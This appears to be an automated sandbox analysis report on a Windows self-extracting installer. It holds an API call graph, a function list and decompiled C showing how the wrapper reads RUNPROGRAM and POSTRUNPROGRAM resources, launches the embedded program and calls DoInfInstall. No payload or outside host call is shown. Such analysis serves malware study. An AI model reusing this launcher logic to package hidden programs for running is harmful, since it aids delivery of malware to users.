2854 965547 2849->2854 2858 9654da 2850->2858 2856 96658a CharPrevA 2851->2856 2852->2714 2864 962630 GetWindowsDirectoryA 2852->2864 2857 966285 GetLastError 2853->2857 2854->2848 2859 96555c 2855->2859 2856->2860 2861 96557c 2857->2861 2858->2851 2862 96658a CharPrevA 2858->2862 2859->2843 2863 965568 RemoveDirectoryA 2859->2863 2912 9658c8 2860->2912 2861->2843 2862->2851 2863->2843 2865 96265e 2864->2865 2866 96266f 2864->2866 2867 9644b9 20 API calls 2865->2867 2868 966ce0 4 API calls 2866->2868 2867->2866 2869 962687 2868->2869 2869->2699 2869->2715 2871 9669a1 2870->2871 2872 96696e GetDiskFreeSpaceA 2870->2872 2871->2724 2872->2871 2873 966989 MulDiv 2872->2873 2873->2871 2875 9659dd GetDiskFreeSpaceA 2874->2875 2876 9659bb 2874->2876 2878 965ba1 memset 2875->2878 2879 965a21 MulDiv 2875->2879 2877 9644b9 20 API calls 2876->2877 2880 9659cc 2877->2880 2881 966285 GetLastError 2878->2881 2879->2878 2882 965a50 GetVolumeInformationA 2879->2882 2883 966285 GetLastError 2880->2883 2884 965bbc GetLastError FormatMessageA 2881->2884 2885 965ab5 SetCurrentDirectoryA 2882->2885 2886 965a6e memset 2882->2886 2887 9659d1 2883->2887 2888 965be3 2884->2888 2895 965acc 2885->2895 2889 966285 GetLastError 2886->2889 2898 965b94 2887->2898 2890 9644b9 20 API calls 2888->2890 2891 965a89 GetLastError FormatMessageA 2889->2891 2892 965bf5 SetCurrentDirectoryA 2890->2892 2891->2888 2892->2898 2893 966ce0 4 API calls 2894 965c11 2893->2894 2894->2699 2896 965b0a 2895->2896 2899 965b20 2895->2899 2897 9644b9 20 API calls 2896->2897 2897->2887 2898->2893 2899->2898 2924 96268b 2899->2924 2903 9653bf 2901->2903 2902 96171e _vsnprintf 2902->2903 2903->2902 2904 96658a CharPrevA 2903->2904 2907 965415 GetTempFileNameA 2903->2907 2905 9653fa RemoveDirectoryA GetFileAttributesA 2904->2905 2905->2903 2906 96544f CreateDirectoryA 2905->2906 2906->2907 2908 96543a 2906->2908 2907->2908 2909 965429 DeleteFileA CreateDirectoryA 2907->2909 2910 966ce0 4 API calls 2908->2910 2909->2908 2911 965449 2910->2911 2911->2846 2913 9658d8 2912->2913 2913->2913 2914 9658df LocalAlloc 2913->2914 2915 9658f3 2914->2915 2916 965919 2914->2916 2917 9644b9 20 API calls 2915->2917 2919 96658a CharPrevA 2916->2919 2923 965906 2917->2923 2918 966285 GetLastError 2920 965534 2918->2920 2921 965931 CreateFileA LocalFree 2919->2921 2920->2848 2920->2849 2922 96595b CloseHandle GetFileAttributesA 2921->2922 2921->2923 2922->2923 2923->2918 2923->2920 2925 9626e5 2924->2925 2926 9626b9 2924->2926 2928 96271f 2925->2928 2929 9626ea 2925->2929 2927 96171e _vsnprintf 2926->2927 2930 9626cc 2927->2930 2932 96171e _vsnprintf 2928->2932 2937 9626e3 2928->2937 2931 96171e _vsnprintf 2929->2931 2933 9644b9 20 API calls 2930->2933 2935 9626fd 2931->2935 2936 962735 2932->2936 2933->2937 2934 966ce0 4 API calls 2938 96276d 2934->2938 2939 9644b9 20 API calls 2935->2939 2940 9644b9 20 API calls 2936->2940 2937->2934 2938->2898 2939->2937 2940->2937 2942 96468f 7 API calls 2941->2942 2943 964ff5 FindResourceA LoadResource LockResource 2942->2943 2944 965020 2943->2944 2945 96515f 2943->2945 2946 965057 2944->2946 2947 965029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2944->2947 2945->2742 2963 964efd 2946->2963 2947->2946 2950 965060 2952 9644b9 20 API calls 2950->2952 2951 96507c 2953 965106 2951->2953 2954 9650e8 2951->2954 2958 965075 2952->2958 2956 965110 FreeResource 2953->2956 2957 96511d 2953->2957 2955 9644b9 20 API calls 2954->2955 2955->2958 2956->2957 2959 96513a 2957->2959 2960 965129 2957->2960 2958->2953 2959->2945 2962 96514c SendMessageA 2959->2962 2961 9644b9 20 API calls 2960->2961 2961->2959 2962->2945 2964 964f4a 2963->2964 2965 964980 25 API calls 2964->2965 2970 964fa1 2964->2970 2968 964f67 2965->2968 2966 966ce0 4 API calls 2967 964fc6 2966->2967 2967->2950 2967->2951 2969 964b60 FindCloseChangeNotification 2968->2969 2968->2970 2969->2970 2970->2966 2972 962510 2971->2972 2973 96255b 2971->2973 2974 96658a CharPrevA 2972->2974 2975 966ce0 4 API calls 2973->2975 2976 962522 WritePrivateProfileStringA _lopen 2974->2976 2977 962569 2975->2977 2976->2973 2978 962548 _llseek _lclose 2976->2978 2977->2752 2978->2973 2980 961b25 2979->2980 3083 961a84 2980->3083 2982 961b57 2983 96658a CharPrevA 2982->2983 2985 961b8c 2982->2985 2983->2985 2984 9666c8 2 API calls 2986 961bd1 2984->2986 2985->2984 2987 961d73 2986->2987 2988 961bd9 CompareStringA 2986->2988 2990 9666c8 2 API calls 2987->2990 2988->2987 2989 961bf7 GetFileAttributesA 2988->2989 2991 961d53 2989->2991 2992 961c0d 2989->2992 2993 961d7d 2990->2993 2996 9644b9 20 API calls 2991->2996 2992->2991 2998 961a84 2 API calls 2992->2998 2994 961d81 CompareStringA 2993->2994 2995 961df8 LocalAlloc 2993->2995 2994->2995 3005 961d9b 2994->3005 2995->2991 2997 961e0b GetFileAttributesA 2995->2997 3016 961cc2 2996->3016 2999 961e1d 2997->2999 3018 961e45 2997->3018 3000 961c31 2998->3000 2999->3018 3002 961c50 LocalAlloc 3000->3002 3009 961a84 2 API calls 3000->3009 3001 961e89 3004 966ce0 4 API calls 3001->3004 3002->2991 3003 961c67 GetPrivateProfileIntA GetPrivateProfileStringA 3002->3003 3012 961cf8 3003->3012 3003->3016 3008 961ea1 3004->3008 3005->3005 3010 961dbe LocalAlloc 3005->3010 3008->2765 3009->3002 3010->2991 3011 961de1 3010->3011 3013 96171e _vsnprintf 3011->3013 3014 961d23 3012->3014 3015 961d09 GetShortPathNameA 3012->3015 3013->3016 3017 96171e _vsnprintf 3014->3017 3015->3014 3016->3001 3017->3016 3089 962aac 3018->3089 3020 962256 3019->3020 3021 96209a 3019->3021 3022 966ce0 4 API calls 3020->3022 3024 96171e _vsnprintf 3021->3024 3026 9620dc 3021->3026 3023 962263 3022->3023 3023->2765 3025 9620af RegQueryValueExA 3024->3025 3025->3021 3025->3026 3027 9620e4 RegCloseKey 3026->3027 3028 9620fb GetSystemDirectoryA 3026->3028 3027->3020 3029 96658a CharPrevA 3028->3029 3030 96211b LoadLibraryA 3029->3030 3031 96212e GetProcAddress FreeLibrary 3030->3031 3032 962179 GetModuleFileNameA 3030->3032 3031->3032 3033 96214e GetSystemDirectoryA 3031->3033 3034 9621de RegCloseKey 3032->3034 3037 962177 LocalAlloc 3032->3037 3035 962165 3033->3035 3033->3037 3034->3020 3036 96658a CharPrevA 3035->3036 3036->3037 3039 9621ec 3037->3039 3040 9621cd 3037->3040 3042 96171e _vsnprintf 3039->3042 3041 9644b9 20 API calls 3040->3041 3041->3034 3043 962218 RegSetValueExA RegCloseKey LocalFree 3042->3043 3043->3020 3046 964016 CreateProcessA 3045->3046 3057 964106 3045->3057 3047 9640c4 3046->3047 3048 964041 WaitForSingleObject GetExitCodeProcess 3046->3048 3050 966285 GetLastError 3047->3050 3053 964070 3048->3053 3049 966ce0 4 API calls 3051 964117 3049->3051 3052 9640c9 GetLastError FormatMessageA 3050->3052 3051->2765 3055 9644b9 20 API calls 3052->3055 3116 96411b 3053->3116 3055->3057 3056 964096 CloseHandle CloseHandle 3056->3057 3058 9640ba 3056->3058 3057->3049 3058->3057 3060 9664c2 3059->3060 3061 96658a CharPrevA 3060->3061 3062 9664d8 GetFileAttributesA 3061->3062 3063 966501 LoadLibraryA 3062->3063 3064 9664ea 3062->3064 3066 966508 3063->3066 3064->3063 3065 9664ee LoadLibraryExA 3064->3065 3065->3066 3067 966ce0 4 API calls 3066->3067 3068 966513 3067->3068 3068->2791 3070 962289 RegOpenKeyExA 3069->3070 3072 962381 3069->3072 3070->3072 3073 9622b1 RegQueryValueExA 3070->3073 3071 966ce0 4 API calls 3074 96238c 3071->3074 3072->3071 3075 9622e6 memset GetSystemDirectoryA 3073->3075 3076 962374 RegCloseKey 3073->3076 3074->2770 3077 962321 3075->3077 3078 96230f 3075->3078 3076->3072 3080 96171e _vsnprintf 3077->3080 3079 96658a CharPrevA 3078->3079 3079->3077 3081 96233f RegSetValueExA 3080->3081 3081->3076 3084 961a9a 3083->3084 3086 961aaf 3084->3086 3087 961aba 3084->3087 3102 96667f 3084->3102 3086->3087 3088 96667f 2 API calls 3086->3088 3087->2982 3088->3086 3090 962ad4 GetModuleFileNameA 3089->3090 3091 962be6 3089->3091 3101 962b02 3090->3101 3092 966ce0 4 API calls 3091->3092 3094 962bf5 3092->3094 3093 962af1 IsDBCSLeadByte 3093->3101 3094->3001 3095 962b11 CharNextA CharUpperA 3098 962b8d CharUpperA 3095->3098 3095->3101 3096 962bca CharNextA 3097 962bd3 CharNextA 3096->3097 3097->3101 3098->3101 3100 962b43 CharPrevA 3100->3101 3101->3091 3101->3093 3101->3095 3101->3096 3101->3097 3101->3100 3107 9665e8 3101->3107 3104 966689 3102->3104 3103 9666a5 3103->3084 3104->3103 3105 966648 IsDBCSLeadByte 3104->3105 3106 966697 CharNextA 3104->3106 3105->3104 3106->3104 3108 9665f4 3107->3108 3108->3108 3109 9665fb CharPrevA 3108->3109 3110 966611 CharPrevA 3109->3110 3111 96661e 3110->3111 3112 96660b 3110->3112 3113 96663d 3111->3113 3114 966627 CharPrevA 3111->3114 3115 966634 CharNextA 3111->3115 3112->3110 3112->3111 3113->3101 3114->3113 3114->3115 3115->3113 3117 964132 3116->3117 3119 96412a 3116->3119 3120 961ea7 3117->3120 3119->3056 3121 961eba 3120->3121 3122 961ed3 3120->3122 3123 96256d 15 API calls 3121->3123 3122->3119 3123->3122 3125 962026 3124->3125 3126 961ff0 RegOpenKeyExA 3124->3126 3125->2480 3126->3125 3127 96200f RegDeleteValueA RegCloseKey 3126->3127 3127->3125 3275 9619e0 3276 961a24 GetDesktopWindow 3275->3276 3277 961a03 3275->3277 3278 9643d0 11 API calls 3276->3278 3279 961a16 EndDialog 3277->3279 3280 961a20 3277->3280 3281 961a33 LoadStringA SetDlgItemTextA MessageBeep 3278->3281 3279->3280 3282 966ce0 4 API calls 3280->3282 3281->3280 3283 961a7e 3282->3283 3284 966a20 __getmainargs 3285 966bef _XcptFilter

                                                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                                                    callgraph 0 Function_00966495 13 Function_00961781 0->13 15 Function_0096658A 0->15 56 Function_00966CE0 0->56 1 Function_00966793 2 Function_00961F90 22 Function_009644B9 2->22 23 Function_00961EA7 2->23 2->56 3 Function_00962390 3->3 12 Function_00961680 3->12 3->15 19 Function_009616B3 3->19 3->56 4 Function_00965C9E 4->12 4->15 4->22 43 Function_009666C8 4->43 55 Function_009631E0 4->55 4->56 70 Function_00965C17 4->70 95 Function_00966E2A 4->95 107 Function_0096667F 4->107 5 Function_00966298 5->56 75 Function_0096171E 5->75 6 Function_00964E99 6->12 7 Function_00961A84 7->107 8 Function_00966285 9 Function_00966380 10 Function_00963680 11 Function_00964980 11->22 109 Function_0096487A 11->109 12->13 14 Function_0096468F 15->19 16 Function_0096268B 16->22 16->56 16->75 17 Function_00962A89 18 Function_009652B6 18->3 18->13 18->56 60 Function_00961FE1 18->60 69 Function_009665E8 18->69 19->13 20 Function_009669B0 21 Function_00966FBE 20->21 64 Function_009671EF 20->64 83 Function_00967000 20->83 106 Function_00966C70 20->106 96 Function_00966F54 21->96 22->12 45 Function_009667C9 22->45 22->56 22->75 76 Function_0096681F 22->76 117 Function_0096256D 23->117 24 Function_00966FA5 102 Function_0096724D 24->102 25 Function_00963BA2 25->0 25->8 25->13 25->14 25->22 25->56 63 Function_00963FEF 25->63 67 Function_00961AE8 25->67 94 Function_0096202A 25->94 111 Function_00962267 25->111 26 Function_009672A2 27 Function_009618A3 27->56 62 Function_009617EE 27->62 28 Function_00964CA0 29 Function_009655A0 29->8 29->13 29->14 29->15 29->22 29->56 71 Function_00966517 29->71 87 Function_00962630 29->87 98 Function_00966952 29->98 108 Function_0096597D 29->108 110 Function_00965467 29->110 30 Function_009653A1 30->12 30->15 30->56 30->75 31 Function_00966FA1 32 Function_009666AE 33 Function_00962AAC 33->12 44 Function_009617C8 33->44 33->56 33->69 34 Function_00962CAA 34->3 34->4 34->14 34->22 34->27 34->56 61 Function_009636EE 34->61 34->71 35 Function_00964AD0 35->10 36 Function_00964CD0 36->6 36->11 36->56 58 Function_009647E0 36->58 79 Function_00964702 36->79 86 Function_00964C37 36->86 113 Function_00964B60 36->113 118 Function_0096476D 36->118 37 Function_009643D0 37->56 38 Function_00964CC0 39 Function_00964BC0 40 Function_009630C0 41 Function_009663C0 41->13 41->15 41->56 42 Function_009658C8 42->8 42->12 42->15 42->22 103 Function_00966648 43->103 45->1 46 Function_00966CF0 47 Function_009634F0 47->10 47->22 47->37 48 Function_00966EF0 49 Function_009670FE 50 Function_00964EFD 50->11 50->56 50->113 51 Function_00962BFB 51->2 51->18 51->34 77 Function_00962F1D 51->77 52 Function_009666F9 53 Function_009651E5 53->8 53->14 53->22 54 Function_00964FE0 54->14 54->22 54->50 56->46 57 Function_009624E0 57->15 57->56 58->12 58->22 59 Function_009619E0 59->37 59->56 61->17 61->22 61->45 61->56 68 Function_009628E8 61->68 61->76 62->56 63->8 63->22 63->56 78 Function_0096411B 63->78 65 Function_00966BEF 66 Function_009670EB 67->7 67->12 67->13 67->15 67->19 67->22 67->33 67->43 67->56 67->75 68->17 104 Function_00962773 68->104 71->22 72 Function_00967010 73 Function_00963210 73->15 73->22 73->37 73->42 91 Function_00964224 73->91 73->108 74 Function_0096621E 74->8 74->22 74->56 74->108 76->52 76->56 77->8 77->15 77->22 77->25 77->29 77->53 77->56 77->74 88 Function_00963A3F 77->88 90 Function_00963B26 77->90 112 Function_00965164 77->112 77->117 119 Function_00964169 77->119 78->23 79->12 79->19 80 Function_00966C03 80->102 81 Function_00963100 81->37 82 Function_00964200 84 Function_0096490C 85 Function_00967208 87->22 87->56 88->8 88->14 88->22 88->71 89 Function_00966C3F 90->5 90->54 90->71 91->12 91->22 92 Function_00967120 93 Function_00966A20 94->15 94->22 94->56 94->75 95->46 96->85 96->102 97 Function_00967155 99 Function_00964A50 100 Function_00963450 100->37 101 Function_00966F40 104->12 104->13 104->15 104->56 105 Function_00967270 107->103 108->8 108->16 108->22 108->56 109->84 110->8 110->12 110->13 110->15 110->30 110->42 110->56 110->108 111->15 111->56 111->75 112->5 112->14 112->22 114 Function_00966A60 114->51 114->85 114->89 114->97 114->102 115 Function_00967060 114->115 115->72 115->92 116 Function_00966760 117->57 118->32 118->71 119->14 119->22

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 00963BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308libraryloaderCOMMONCrypto
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 36 963ba2-963bd9 37 963bfd-963bff 36->37 38 963bdb-963bee call 96468f 36->38 40 963c03-963c28 memset 37->40 44 963bf4-963bf7 38->44 45 963d13-963d30 call 9644b9 38->45 42 963d35-963d48 call 961781 40->42 43 963c2e-963c40 call 96468f 40->43 49 963d4d-963d52 42->49 43->45 54 963c46-963c49 43->54 44->37 44->45 55 963f4d 45->55 52 963d54-963d6c call 96468f 49->52 53 963d9e-963db6 call 961ae8 49->53 52->45 66 963d6e-963d75 52->66 53->55 64 963dbc-963dc2 53->64 54->45 57 963c4f-963c56 54->57 59 963f4f-963f63 call 966ce0 55->59 61 963c60-963c65 57->61 62 963c58-963c5e 57->62 68 963c67-963c6d 61->68 69 963c75-963c7c 61->69 67 963c6e-963c73 62->67 70 963de6-963de8 64->70 71 963dc4-963dce 64->71 75 963fda-963fe1 66->75 76 963d7b-963d98 CompareStringA 66->76 72 963c87-963c89 67->72 68->67 69->72 73 963c7e-963c82 69->73 79 963dee-963df5 70->79 80 963f0b-963f15 call 963fef 70->80 71->70 77 963dd0-963dd7 71->77 72->49 78 963c8f-963c98 72->78 73->72 81 963fe3 call 962267 75->81 82 963fe8-963fea 75->82 76->53 76->75 77->70 84 963dd9-963ddb 77->84 85 963cf1-963cf3 78->85 86 963c9a-963c9c 78->86 87 963fab-963fd2 call 9644b9 LocalFree 79->87 88 963dfb-963dfd 79->88 90 963f1a-963f1c 80->90 81->82 82->59 84->79 91 963ddd-963de1 call 96202a 84->91 85->53 96 963cf9-963d11 call 96468f 85->96 93 963ca5-963ca7 86->93 94 963c9e-963ca3 86->94 87->55 88->80 95 963e03-963e0a 88->95 98 963f46-963f47 LocalFree 90->98 99 963f1e-963f2d LocalFree 90->99 91->70 93->55 103 963cad 93->103 102 963cb2-963cc5 call 96468f 94->102 95->80 104 963e10-963e19 call 966495 95->104 96->45 96->49 98->55 106 963fd7-963fd9 99->106 107 963f33-963f3b 99->107 102->45 112 963cc7-963ce8 CompareStringA 102->112 103->102 113 963f92-963fa9 call 9644b9 104->113 114 963e1f-963e36 GetProcAddress 104->114 106->75 107->40 112->85 116 963cea-963ced 112->116 125 963f7c-963f90 LocalFree call 966285 113->125 117 963f64-963f76 call 9644b9 FreeLibrary 114->117 118 963e3c-963e80 114->118 116->85 117->125 121 963e82-963e87 118->121 122 963e8b-963e94 118->122 121->122 123 963e96-963e9b 122->123 124 963e9f-963ea2 122->124 123->124 127 963ea4-963ea9 124->127 128 963ead-963eb6 124->128 125->55 127->128 131 963ec1-963ec3 128->131 132 963eb8-963ebd 128->132 133 963ec5-963eca 131->133 134 963ece-963eec 131->134 132->131 133->134 137 963ef5-963efd 134->137 138 963eee-963ef3 134->138 139 963f40 FreeLibrary 137->139 140 963eff-963f09 FreeLibrary 137->140 138->137 139->98 140->99
                                                                                                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                                                                                                    			E00963BA2() {
				signed int _v8;
				signed int _v12;
				char _v276;
				char _v280;
				short _v300;
				intOrPtr _v304;
				void _v348;
				char _v352;
				intOrPtr _v356;
				signed int _v360;
				short _v364;
				char* _v368;
				intOrPtr _v372;
				void* _v376;
				intOrPtr _v380;
				char _v384;
				signed int _v388;
				intOrPtr _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				void* _v408;
				void* _v424;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t76;
				void* _t77;
				signed int _t79;
				short _t96;
				signed int _t97;
				intOrPtr _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				int _t112;
				void* _t115;
				signed char _t118;
				void* _t125;
				signed int _t127;
				void* _t128;
				struct HINSTANCE__* _t129;
				void* _t130;
				short _t137;
				char* _t140;
				signed char _t144;
				signed char _t145;
				signed int _t149;
				void* _t150;
				void* _t151;
				signed int _t153;
				void* _t155;
				void* _t156;
				signed int _t157;
				signed int _t162;
				signed int _t164;
				void* _t165;

				_t164 = (_t162 & 0xfffffff8) - 0x194;
				_t69 =  *0x968004; // 0xf4cc89a0
				_v8 = _t69 ^ _t164;
				_t153 = 0;
				 *0x969124 =  *0x969124 & 0;
				_t149 = 0;
				_v388 = 0;
				_v384 = 0;
				_t165 =  *0x968a28 - _t153; // 0x0
				if(_t165 != 0) {
					L3:
					_t127 = 0;
					_v392 = 0;
					while(1) {
						_v400 = _v400 & 0x00000000;
						memset( &_v348, 0, 0x44);
						_t164 = _t164 + 0xc;
						_v348 = 0x44;
						if( *0x968c42 != 0) {
							goto L26;
						}
						_t146 =  &_v396;
						_t115 = E0096468F("SHOWWINDOW",  &_v396, 4);
						if(_t115 == 0 || _t115 > 4) {
							L25:
							_t146 = 0x4b1;
							E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
							 *0x969124 = 0x80070714;
							goto L62;
						} else {
							if(_v396 != 1) {
								__eflags = _v396 - 2;
								if(_v396 != 2) {
									_t137 = 3;
									__eflags = _v396 - _t137;
									if(_v396 == _t137) {
										_v304 = 1;
										_v300 = _t137;
									}
									goto L14;
								}
								_push(6);
								_v304 = 1;
								_pop(0);
								goto L11;
							} else {
								_v304 = 1;
								L11:
								_v300 = 0;
								L14:
								if(_t127 != 0) {
									L27:
									_t155 = 1;
									__eflags = _t127 - 1;
									if(_t127 != 1) {
										L31:
										_t132 =  &_v280;
										_t76 = E00961AE8( &_v280,  &_v408,  &_v404); // executed
										__eflags = _t76;
										if(_t76 == 0) {
											L62:
											_t77 = 0;
											L63:
											_pop(_t150);
											_pop(_t156);
											_pop(_t128);
											return E00966CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
										}
										_t157 = _v404;
										__eflags = _t149;
										if(_t149 != 0) {
											L37:
											__eflags = _t157;
											if(_t157 == 0) {
												L57:
												_t151 = _v408;
												_t146 =  &_v352;
												_t130 = _t151; // executed
												_t79 = E00963FEF(_t130,  &_v352); // executed
												__eflags = _t79;
												if(_t79 == 0) {
													L61:
													LocalFree(_t151);
													goto L62;
												}
												L58:
												LocalFree(_t151);
												_t127 = _t127 + 1;
												_v396 = _t127;
												__eflags = _t127 - 2;
												if(_t127 >= 2) {
													_t155 = 1;
													__eflags = 1;
													L69:
													__eflags =  *0x968580;
													if( *0x968580 != 0) {
														E00962267();
													}
													_t77 = _t155;
													goto L63;
												}
												_t153 = _v392;
												_t149 = _v388;
												continue;
											}
											L38:
											__eflags =  *0x968180;
											if( *0x968180 == 0) {
												_t146 = 0x4c7;
												E009644B9(0, 0x4c7, 0, 0, 0x10, 0);
												LocalFree(_v424);
												 *0x969124 = 0x8007042b;
												goto L62;
											}
											__eflags = _t157;
											if(_t157 == 0) {
												goto L57;
											}
											__eflags =  *0x969a34 & 0x00000004;
											if(__eflags == 0) {
												goto L57;
											}
											_t129 = E00966495(_t127, _t132, _t157, __eflags);
											__eflags = _t129;
											if(_t129 == 0) {
												_t146 = 0x4c8;
												E009644B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
												L65:
												LocalFree(_v408);
												 *0x969124 = E00966285();
												goto L62;
											}
											_t146 = GetProcAddress(_t129, "DoInfInstall");
											_v404 = _t146;
											__eflags = _t146;
											if(_t146 == 0) {
												_t146 = 0x4c9;
												__eflags = 0;
												E009644B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
												FreeLibrary(_t129);
												goto L65;
											}
											__eflags =  *0x968a30;
											_t151 = _v408;
											_v384 = 0;
											_v368 =  &_v280;
											_t96 =  *0x969a40; // 0x3
											_v364 = _t96;
											_t97 =  *0x968a38 & 0x0000ffff;
											_v380 = 0x969154;
											_v376 = _t151;
											_v372 = 0x9691e4;
											_v360 = _t97;
											if( *0x968a30 != 0) {
												_t97 = _t97 | 0x00010000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t144 =  *0x969a34; // 0x1
											__eflags = _t144 & 0x00000008;
											if((_t144 & 0x00000008) != 0) {
												_t97 = _t97 | 0x00020000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t144 & 0x00000010;
											if((_t144 & 0x00000010) != 0) {
												_t97 = _t97 | 0x00040000;
												__eflags = _t97;
												_v360 = _t97;
											}
											_t145 =  *0x968d48; // 0x0
											__eflags = _t145 & 0x00000040;
											if((_t145 & 0x00000040) != 0) {
												_t97 = _t97 | 0x00080000;
												__eflags = _t97;
												_v360 = _t97;
											}
											__eflags = _t145;
											if(_t145 < 0) {
												_t104 = _t97 | 0x00100000;
												__eflags = _t104;
												_v360 = _t104;
											}
											_t98 =  *0x969a38; // 0x0
											_v356 = _t98;
											_t130 = _t146;
											 *0x96a288( &_v384);
											_t101 = _v404();
											__eflags = _t164 - _t164;
											if(_t164 != _t164) {
												_t130 = 4;
												asm("int 0x29");
											}
											 *0x969124 = _t101;
											_push(_t129);
											__eflags = _t101;
											if(_t101 < 0) {
												FreeLibrary();
												goto L61;
											} else {
												FreeLibrary();
												_t127 = _v400;
												goto L58;
											}
										}
										__eflags =  *0x969a40 - 1; // 0x3
										if(__eflags == 0) {
											goto L37;
										}
										__eflags =  *0x968a20;
										if( *0x968a20 == 0) {
											goto L37;
										}
										__eflags = _t157;
										if(_t157 != 0) {
											goto L38;
										}
										_v388 = 1;
										E0096202A(_t146); // executed
										goto L37;
									}
									_t146 =  &_v280;
									_t108 = E0096468F("POSTRUNPROGRAM",  &_v280, 0x104);
									__eflags = _t108;
									if(_t108 == 0) {
										goto L25;
									}
									__eflags =  *0x968c42;
									if( *0x968c42 != 0) {
										goto L69;
									}
									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
									__eflags = _t112 == 0;
									if(_t112 == 0) {
										goto L69;
									}
									goto L31;
								}
								_t118 =  *0x968a38; // 0x0
								if(_t118 == 0) {
									L23:
									if(_t153 != 0) {
										goto L31;
									}
									_t146 =  &_v276;
									if(E0096468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
										goto L27;
									}
									goto L25;
								}
								if((_t118 & 0x00000001) == 0) {
									__eflags = _t118 & 0x00000002;
									if((_t118 & 0x00000002) == 0) {
										goto L62;
									}
									_t140 = "USRQCMD";
									L20:
									_t146 =  &_v276;
									if(E0096468F(_t140,  &_v276, 0x104) == 0) {
										goto L25;
									}
									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
										_t153 = 1;
										_v388 = 1;
									}
									goto L23;
								}
								_t140 = "ADMQCMD";
								goto L20;
							}
						}
						L26:
						_push(_t130);
						_t146 = 0x104;
						E00961781( &_v276, 0x104, _t130, 0x968c42);
						goto L27;
					}
				}
				_t130 = "REBOOT";
				_t125 = E0096468F(_t130, 0x969a2c, 4);
				if(_t125 == 0 || _t125 > 4) {
					goto L25;
				} else {
					goto L3;
				}
			}





























































                                                                                                                                                                                                                                    0x00963baa
                                                                                                                                                                                                                                    0x00963bb0
                                                                                                                                                                                                                                    0x00963bb7
                                                                                                                                                                                                                                    0x00963bc0
                                                                                                                                                                                                                                    0x00963bc2
                                                                                                                                                                                                                                    0x00963bc9
                                                                                                                                                                                                                                    0x00963bcb
                                                                                                                                                                                                                                    0x00963bcf
                                                                                                                                                                                                                                    0x00963bd3
                                                                                                                                                                                                                                    0x00963bd9
                                                                                                                                                                                                                                    0x00963bfd
                                                                                                                                                                                                                                    0x00963bfd
                                                                                                                                                                                                                                    0x00963bff
                                                                                                                                                                                                                                    0x00963c03
                                                                                                                                                                                                                                    0x00963c03
                                                                                                                                                                                                                                    0x00963c11
                                                                                                                                                                                                                                    0x00963c16
                                                                                                                                                                                                                                    0x00963c19
                                                                                                                                                                                                                                    0x00963c28
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963c30
                                                                                                                                                                                                                                    0x00963c39
                                                                                                                                                                                                                                    0x00963c40
                                                                                                                                                                                                                                    0x00963d13
                                                                                                                                                                                                                                    0x00963d15
                                                                                                                                                                                                                                    0x00963d21
                                                                                                                                                                                                                                    0x00963d26
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963c4f
                                                                                                                                                                                                                                    0x00963c56
                                                                                                                                                                                                                                    0x00963c60
                                                                                                                                                                                                                                    0x00963c65
                                                                                                                                                                                                                                    0x00963c77
                                                                                                                                                                                                                                    0x00963c78
                                                                                                                                                                                                                                    0x00963c7c
                                                                                                                                                                                                                                    0x00963c7e
                                                                                                                                                                                                                                    0x00963c82
                                                                                                                                                                                                                                    0x00963c82
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963c7c
                                                                                                                                                                                                                                    0x00963c67
                                                                                                                                                                                                                                    0x00963c69
                                                                                                                                                                                                                                    0x00963c6d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963c58
                                                                                                                                                                                                                                    0x00963c58
                                                                                                                                                                                                                                    0x00963c6e
                                                                                                                                                                                                                                    0x00963c6e
                                                                                                                                                                                                                                    0x00963c87
                                                                                                                                                                                                                                    0x00963c89
                                                                                                                                                                                                                                    0x00963d4d
                                                                                                                                                                                                                                    0x00963d4f
                                                                                                                                                                                                                                    0x00963d50
                                                                                                                                                                                                                                    0x00963d52
                                                                                                                                                                                                                                    0x00963d9e
                                                                                                                                                                                                                                    0x00963da8
                                                                                                                                                                                                                                    0x00963daf
                                                                                                                                                                                                                                    0x00963db4
                                                                                                                                                                                                                                    0x00963db6
                                                                                                                                                                                                                                    0x00963f4d
                                                                                                                                                                                                                                    0x00963f4d
                                                                                                                                                                                                                                    0x00963f4f
                                                                                                                                                                                                                                    0x00963f56
                                                                                                                                                                                                                                    0x00963f57
                                                                                                                                                                                                                                    0x00963f58
                                                                                                                                                                                                                                    0x00963f63
                                                                                                                                                                                                                                    0x00963f63
                                                                                                                                                                                                                                    0x00963dbc
                                                                                                                                                                                                                                    0x00963dc0
                                                                                                                                                                                                                                    0x00963dc2
                                                                                                                                                                                                                                    0x00963de6
                                                                                                                                                                                                                                    0x00963de6
                                                                                                                                                                                                                                    0x00963de8
                                                                                                                                                                                                                                    0x00963f0b
                                                                                                                                                                                                                                    0x00963f0b
                                                                                                                                                                                                                                    0x00963f0f
                                                                                                                                                                                                                                    0x00963f13
                                                                                                                                                                                                                                    0x00963f15
                                                                                                                                                                                                                                    0x00963f1a
                                                                                                                                                                                                                                    0x00963f1c
